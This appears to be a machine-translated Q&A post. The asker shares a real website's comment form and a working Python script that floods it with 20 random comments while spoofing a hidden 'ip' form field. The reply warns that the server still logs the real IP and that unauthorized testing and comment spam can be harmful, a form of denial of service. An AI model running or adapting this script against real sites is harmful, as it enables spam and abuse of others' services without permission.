注1:我没有网络编程经验。 注2:我不做任何伤害。评论会自动删除,我并不打算在我认为可行的情况下制定解决方法。我只是在玩。
这是某个网站的评论表:
<form method="post" target="_top" action="index.php" name="akocommentform" />
<input type="hidden" value="com_akocomment" name="option"></input>
<input type="hidden" value="106" name="acitemid"></input>
<input type="hidden" value="20805" name="contentid"></input>
<input type="hidden" value="XX.XX.XXX.XXX" name="ip"></input> # My IP, as a form arg
<input type="hidden" value="entry" name="func"></input>
... stuff ...
<input class="inputbox" type="text" style="width: 250px;" title="Vardas" alt="Vardas" value="" name="acname"></input>
<input type="hidden" value="0" name="iduser"></input>
... more stuff ...
<textarea class="inputbox" wrap="virtual" title="Komentaras" name="comment" rows="8" style="width: 250px; height: 120px;"></textarea>
要发送20条评论,我会运行:
import requests
from random import choice, randrange as rr
from string import ascii_letters as letters
def fake_ip():
return str(rr(256))+'.'+str(rr(256))+'.'+str(rr(256))+'.'+str(rr(256))
comment = ''.join([choice(letters) for x in range(1000)])
name = ''.join([choice(letters) for x in range(15)])
payload = {
'option' : 'com_akocomment',
'acitemid' : '106',
'contentid' : '20586',
'ip' : fake_ip(), # IT WORKS!
'func' : 'entry',
'iduser' : '0',
'acname' : name,
'comment' : comment }
for i in range(20):
response = requests.post('http://www.nyksciai.lt', data=payload)
print (response.status_code, response.reason)
现在我有两个问题:
答案 0 :(得分:3)
通常,Web服务器将在Web服务器请求日志中包含源IP。这将直接使用连接IP。因此,如果您使用真实IP接收表单响应,则可能正在记录,因此您可以进行跟踪。
在未经许可的情况下测试其他人网站的安全性本身也可能被视为伤害。绝对通过评论向某人的网站发送垃圾邮件可能被认为是有害的,因为这是一种拒绝服务攻击的形式。即使自动删除注释也是如此。
你在做什么不是&#34;玩&#34;并可能让你遇到很多麻烦。如果您想进行实验,您应该学习如何在自己的计算机上设置实验。